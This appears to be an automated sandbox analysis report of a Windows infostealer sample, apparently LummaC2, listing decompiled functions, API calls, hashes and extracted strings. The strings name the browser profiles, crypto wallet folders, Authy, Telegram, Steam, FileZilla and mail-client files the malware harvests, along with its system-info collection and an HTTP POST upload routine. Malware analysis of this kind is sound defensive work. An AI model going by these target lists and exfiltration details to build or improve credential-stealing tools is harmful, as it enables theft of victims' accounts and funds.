ebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                          • API String ID: 4038537762-1377293222
                                                          • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                          • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                          • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                          • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                          Function 0042D658 Relevance: 104.1, Strings: 82, Instructions: 1594COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                          • API String ID: 0-3008219856
                                                          • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                          • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                          • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                          • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                          Function 00436ADC Relevance: 91.3, APIs: 22, Strings: 29, Instructions: 2004COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                          • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                          • API String ID: 3760342818-3740799521
                                                          • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                          • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                          • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                          • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                          Function 0040B81C Relevance: 70.2, APIs: 17, Strings: 22, Instructions: 1922stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                          • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                          • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                          • lstrlenW.KERNEL32(?), ref: 0040C581
                                                          • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                          • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                          • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$lstrcatlstrcmp
                                                          • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                          • API String ID: 156957741-3266097529
                                                          • Opcode ID: c95b718d94f02bf5dd70c107e4f8e7e3b8c47b9c873664cf438ec1a2df9c61be
                                                          • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                          • Opcode Fuzzy Hash: c95b718d94f02bf5dd70c107e4f8e7e3b8c47b9c873664cf438ec1a2df9c61be
                                                          • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                          Function 0041F9A4 Relevance: 40.6, APIs: 6, Strings: 16, Instructions: 2064COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                          • API String ID: 0-3469262258
                                                          • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                          • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                          • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                          • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                          Function 0040E14E Relevance: 40.3, APIs: 6, Strings: 16, Instructions: 1822stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                          • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 4038537762-116603239
                                                          • Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                          • Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
                                                          • Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                          • Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                          Function 00430E6C Relevance: 39.9, APIs: 14, Strings: 8, Instructions: 1432memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                          • GetProcessHeap.KERNEL32 ref: 004314B2
                                                          • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                          • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                          • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                          • GetProcessHeap.KERNEL32 ref: 004326F0
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                          • GetProcessHeap.KERNEL32 ref: 00432701
                                                          • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                          • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                          • API String ID: 2023195035-2600574631
                                                          • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                          • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                          • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                          • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                          Function 00434080 Relevance: 39.4, APIs: 10, Strings: 12, Instructions: 872registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfW.USER32 ref: 004346DB
                                                          • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                          • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                          • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                          • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$EnumOpenwsprintf
                                                          • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
                                                          • API String ID: 44529101-205855365
                                                          • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                          • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                          • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                          • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                          Function 0042AD82 Relevance: 25.7, Strings: 20, Instructions: 749COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                          • API String ID: 4038537762-373908387
                                                          • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                          • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                          • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                          • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF
                                                          Function 00405AAA Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 448stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4850 405aaa-405ac0 4851 405ac3 4850->4851 4852 405ac9-405ad1 4851->4852 4853 405ad3-405ad8 4852->4853 4854 405b3c-405b41 4852->4854 4857 405ade-405ae3 4853->4857 4858 405b7f-405b84 4853->4858 4855 405b43-405b48 4854->4855 4856 405bbb-405bc0 4854->4856 4861 405c2e-405c33 4855->4861 4862 405b4e-405b53 4855->4862 4859 405ca3-405ca8 4856->4859 4860 405bc6-405bcb 4856->4860 4865 405ae9-405aee 4857->4865 4866 405bfd-405c02 4857->4866 4863 405c54-405c59 4858->4863 4864 405b8a-405b8f 4858->4864 4869 405e71-405e76 4859->4869 4870 405cae-405cb3 4859->4870 4867 405bd1-405bd6 4860->4867 4868 405dab-405db0 4860->4868 4875 405e15-405e1a 4861->4875 4876 405c39-405c3e 4861->4876 4871 405d22-405d27 4862->4871 4872 405b59-405b5e 4862->4872 4879 405e3d-405e42 4863->4879 4880 405c5f-405c64 4863->4880 4877 405d74-405d79 4864->4877 4878 405b95-405b9a 4864->4878 4881 405af4-405af9 4865->4881 4882 405ce5-405cea 4865->4882 4873 405dc6-405dcb 4866->4873 4874 405c08-405c0d 4866->4874 4883 405bdc-405be1 4867->4883 4884 405fcd-405fda 4867->4884 4887 4060a2-4060b3 4868->4887 4888 405db6-405dbb 4868->4888 4903 405e7c-405e81 4869->4903 4904 40617d-406197 call 4052a1 4869->4904 4905 405cb9-405cbe 4870->4905 4906 40602c-40604e 4870->4906 4913 406077-40608c 4871->4913 4914 405d2d-405d32 4871->4914 4907 405b64-405b69 4872->4907 4908 405f1c-405f5c call 404edc call 4048e2 4872->4908 4891 405dd1-405dd6 4873->4891 4892 4060c3-4060dd 4873->4892 4889 405c13-405c18 4874->4889 4890 405fdf-406009 4874->4890 4895 405e20-405e25 4875->4895 4896 4060e6 4875->4896 4893 405c44-405c49 4876->4893 4894 406018-406027 lstrcatW 4876->4894 4885 406091-40609d 4877->4885 4886 405d7f-405d84 4877->4886 4911 405fa0-405fc8 call 404988 4878->4911 4912 405ba0-405ba5 4878->4912 4901 405e48-405e4d 4879->4901 4902 4060fe-406109 4879->4902 4897 405c6a-405c6f 4880->4897 4898 40615f-406166 call 447047 4880->4898 4899 405ebc-405ee8 lstrcatW call 4360e1 lstrcatW * 2 4881->4899 4900 405aff-405b04 4881->4900 4909 405cf0-405cf5 4882->4909 4910 406059-406070 4882->4910 4883->4852 4916 405be7-405bf8 lstrcatW 4883->4916 4884->4852 4885->4852 4886->4852 4936 405d8a-405d9b 4886->4936 4929 406157-40615a 4887->4929 4930 4060b9-4060be 4887->4930 4939 405dc1 4888->4939 4940 406115-406129 4888->4940 4889->4852 4917 405c1e-405c29 4889->4917 4921 406010-406013 4890->4921 4922 40600b 4890->4922 4891->4852 4941 405ddc-405e05 4891->4941 4927 4060df-4060e4 4892->4927 4892->4929 4919 40619c-4061d6 call 4038d5 call 403a1c 4893->4919 4920 405c4f 4893->4920 4894->4852 4895->4852 4942 405e2b-405e38 4895->4942 4932 4060e7 4896->4932 4897->4852 4923 405c75-405c93 call 403600 4897->4923 4958 40616b-406178 4898->4958 4899->4852 4943 405b0a-405b0f 4900->4943 4944 405eed-405f17 lstrcatW call 4360e1 lstrcatW * 2 4900->4944 4901->4852 4945 405e53-405e5a call 447047 4901->4945 4933 40610b-406113 4902->4933 4934 40612e-406150 4902->4934 4903->4852 4946 405e87-405eac 4903->4946 4904->4852 4905->4852 4928 405cc4-405ce0 4905->4928 4924 406152 4906->4924 4925 406054 4906->4925 4947 405f6c-405f90 call 403600 4907->4947 4948 405b6f-405b74 4907->4948 4908->4929 4984 405f62-405f67 4908->4984 4909->4852 4931 405cfb-405d13 call 403e03 4909->4931 4926 406072 4910->4926 4910->4927 4911->4852 4912->4934 4950 405bab-405bb0 4912->4950 4913->4852 4914->4852 4935 405d38-405d64 4914->4935 4916->4852 4917->4852 4987 4061d8 4919->4987 4988 4061dd-4061e0 4919->4988 4920->4852 4921->4852 4922->4921 4923->4929 4981 405c99-405c9e 4923->4981 4924->4929 4925->4929 4926->4929 4927->4929 4928->4852 4929->4852 4930->4929 4965 405d16-405d1d 4931->4965 4932->4932 4933->4898 4933->4940 4934->4924 4934->4929 4935->4921 4956 405d6a-405d6f 4935->4956 4936->4929 4957 405da1-405da6 4936->4957 4939->4852 4940->4852 4941->4921 4961 405e0b-405e10 4941->4961 4942->4852 4943->4852 4962 405b11-405b31 4943->4962 4944->4852 4977 405e5f-405e6c 4945->4977 4946->4929 4964 405eb2-405eb7 4946->4964 4947->4929 4980 405f96-405f9b 4947->4980 4948->4965 4966 405b7a 4948->4966 4950->4852 4969 405bb6-40620a call 4360e1 call 40e14e 4950->4969 4956->4921 4957->4929 4958->4852 4961->4921 4962->4927 4976 405b37 4962->4976 4964->4929 4965->4852 4966->4852 4976->4929 4977->4852 4980->4929 4981->4929 4984->4929 4987->4988 4988->4851
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                          • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                          • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                          • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                          • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                          • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                          • API String ID: 4038537762-1578839816
                                                          • Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                          • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                          • Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                          • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                          Function 0041C270 Relevance: 23.6, APIs: 1, Strings: 12, Instructions: 812COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                          • API String ID: 0-485045143
                                                          • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                          • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                          • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                          • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F
                                                          Function 0040620B Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 445stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5373 40620b-406227 5374 40622d-406235 5373->5374 5375 406237-40623c 5374->5375 5376 40627e-406283 5374->5376 5379 406242-406247 5375->5379 5380 4062ef-4062f4 5375->5380 5377 406289-40628e 5376->5377 5378 40633e-406343 5376->5378 5383 406294-406299 5377->5383 5384 40639b-4063a0 5377->5384 5381 406462-406467 5378->5381 5382 406349-40634e 5378->5382 5387 4063e7-4063ec 5379->5387 5388 40624d-406252 5379->5388 5385 406431-406436 5380->5385 5386 4062fa-4062ff 5380->5386 5399 40664c-406651 5381->5399 5400 40646d-406472 5381->5400 5393 406354-406359 5382->5393 5394 40648f-406494 5382->5394 5397 4064df-4064e4 5383->5397 5398 40629f-4062a4 5383->5398 5401 406521-406526 5384->5401 5402 4063a6-4063ab 5384->5402 5395 406615-40661a 5385->5395 5396 40643c-406441 5385->5396 5403 406305-40630a 5386->5403 5404 406596-40659b 5386->5404 5391 4065e1-4065e6 5387->5391 5392 4063f2-4063f7 5387->5392 5389 406543-406548 5388->5389 5390 406258-40625d 5388->5390 5433 40671a-406740 5389->5433 5434 40654e-406553 5389->5434 5405 406263-406268 5390->5405 5406 4067e4-4067fd call 447047 5390->5406 5413 406767-40676e 5391->5413 5414 4065ec-4065f1 5391->5414 5407 406802-40680d lstrcatW call 40b7bb 5392->5407 5408 4063fd-406402 5392->5408 5427 4066f7-406715 5393->5427 5428 40635f-406364 5393->5428 5421 40649a-40649f 5394->5421 5422 4066ae-4066d0 5394->5422 5419 406620-406625 5395->5419 5420 406773-406784 lstrcatW 5395->5420 5411 406825-406840 call 419e6b 5396->5411 5412 406447-40644c 5396->5412 5429 4066e0-4066f2 call 447a80 5397->5429 5430 4064ea-4064ef 5397->5430 5415 406789-4067ad call 404822 5398->5415 5416 4062aa-4062af 5398->5416 5425 406845-40686e 5399->5425 5426 406657-40665c 5399->5426 5417 406478-40647d 5400->5417 5418 40668f-4066a9 5400->5418 5431 406683-40668a 5401->5431 5432 40652c-406531 5401->5432 5435 4063b1-4063b6 5402->5435 5436 4067b2-4067d4 5402->5436 5423 406310-406315 5403->5423 5424 4064c4-4064c7 5403->5424 5409 406750-406762 call 447a80 5404->5409 5410 4065a1-4065a6 5404->5410 5456 4068d9-4068ec call 403c98 5405->5456 5457 40626e-406273 5405->5457 5406->5374 5480 406812-40681c 5407->5480 5437 406922-406943 lstrcatW * 2 5408->5437 5438 406408-40640d 5408->5438 5409->5374 5410->5374 5458 4065ac-4065d1 5410->5458 5411->5374 5443 406452-406457 5412->5443 5444 406948-406956 5412->5444 5413->5374 5414->5374 5459 4065f7-406610 call 447047 5414->5459 5415->5374 5460 4068b5-4068bc 5416->5460 5461 4062b5-4062ba 5416->5461 5446 406483-40648a 5417->5446 5447 40695b-406960 5417->5447 5418->5374 5419->5374 5462 40662b-40663c 5419->5462 5420->5374 5421->5374 5449 4064a5-4064b0 5421->5449 5440 40691a-40691d 5422->5440 5467 4066d6-4066db 5422->5467 5463 4068f5-406913 5423->5463 5464 40631b-406320 5423->5464 5452 4064c8 5424->5452 5450 406870 5425->5450 5451 406875-406878 5425->5451 5465 406662-40667e lstrcatW * 2 5426->5465 5466 406968-40696d 5426->5466 5427->5374 5468 40636a-40636f 5428->5468 5469 40687d-4068ac call 404a00 5428->5469 5429->5374 5430->5374 5453 4064f5-40651a 5430->5453 5431->5374 5432->5374 5454 406537-40653e 5432->5454 5433->5440 5471 406746-40674b 5433->5471 5434->5374 5455 406559-406586 call 403ac1 call 404f5e 5434->5455 5472 4068c1-4068c7 5435->5472 5473 4063bc-4063c1 5435->5473 5436->5440 5441 4067da-4067df 5436->5441 5437->5374 5438->5374 5475 406413-40642c lstrcatW * 2 5438->5475 5440->5374 5441->5440 5478 4068cd-4068d4 5443->5478 5479 40645d 5443->5479 5444->5374 5446->5374 5447->5374 5490 406966 5447->5490 5449->5458 5482 4064b6-4064be 5449->5482 5450->5451 5451->5374 5452->5452 5484 40658c-406591 5453->5484 5485 40651c 5453->5485 5454->5374 5455->5440 5455->5484 5456->5440 5512 4068ee-4068f3 5456->5512 5457->5374 5489 406275-40627c 5457->5489 5458->5440 5491 4065d7-4065dc 5458->5491 5459->5374 5460->5374 5461->5374 5494 4062c0-4062e4 5461->5494 5462->5440 5495 406642-406647 5462->5495 5463->5440 5488 406915 5463->5488 5464->5374 5496 406326-406339 5464->5496 5465->5374 5466->5374 5492 406973-406991 call 404c9c 5466->5492 5467->5440 5468->5374 5497 406375-406387 call 40b129 5468->5497 5469->5440 5511 4068ae-4068b3 5469->5511 5471->5440 5472->5478 5473->5374 5499 4063c7-4063d7 5473->5499 5475->5374 5478->5374 5479->5374 5480->5451 5501 40681e-406823 5480->5501 5482->5424 5482->5431 5484->5440 5485->5440 5488->5440 5489->5374 5505 406996-4069a0 5490->5505 5491->5440 5492->5505 5508 4062ea 5494->5508 5509 4063dd-4063e2 5494->5509 5495->5440 5496->5374 5514 40638c-406396 5497->5514 5499->5440 5499->5509 5501->5451 5508->5440 5509->5440 5511->5440 5512->5440 5514->5374
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
                                                          • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                          • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                          Strings
                                                          Memory Dump Source
